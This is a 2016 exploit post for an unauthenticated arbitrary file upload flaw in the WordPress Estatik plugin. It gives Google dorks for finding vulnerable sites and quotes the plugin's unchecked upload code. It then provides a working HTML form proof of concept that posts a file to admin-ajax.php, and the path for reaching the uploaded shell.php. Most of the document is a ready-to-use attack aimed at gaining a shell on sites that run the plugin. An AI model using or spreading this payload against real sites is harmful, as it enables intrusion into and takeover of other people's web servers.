3xploit3r

Exploit wordpress Estatik plugins

Aug 27th, 2016
<!--


    \ \   / (_)_ __ _   _ ___\ \/ /  _ \ ____
     \ \ / /| | '__| | | / __|\  /| | | |_  /
      \ V / | | |  | |_| \__ \/  \| |_| |/ /
       \_/  |_|_|   \__,_|___/_/\_\____//___|

                                              -->
#########################################################
#Exploit Title: Arbitrary File Upload Vulnerability in Estatik
#Category: webapps
#Google Dork : inurl:/wp-content/plugins/estatik/
             : index of "/wp-content/plugins/estatik/"
#########################################################

[+] In the affected AJAX handler, the following code saves each uploaded file sent with the request, with no check on the file's type or name:

$image_name = time()."_".$_FILES['es_media_images']['name'][$i];
$sourcePath = $_FILES['es_media_images']['tmp_name'][$i];
$targetPath = $upload_dir['path']."/".$image_name;
move_uploaded_file($sourcePath, $targetPath);

[+] Proof of Concept:

The following proof of concept will upload the selected file and put it in the current
month's directory inside of the /wp-content/uploads/ directory.
The name of the file in the upload directory will be the time the file
was saved, as output by the function time(), followed by a "_"
and then the name of the file as it was uploaded.

Make sure to replace "[path to WordPress]" with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="es_prop_media_images" />
<input type="file" name="es_media_images[]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

[+] shell access:

http://www.Target.com/wp-content/uploads/time/shell.php

Video
https://youtu.be/G80_JRsuY88
Bye..
Algerien Hacker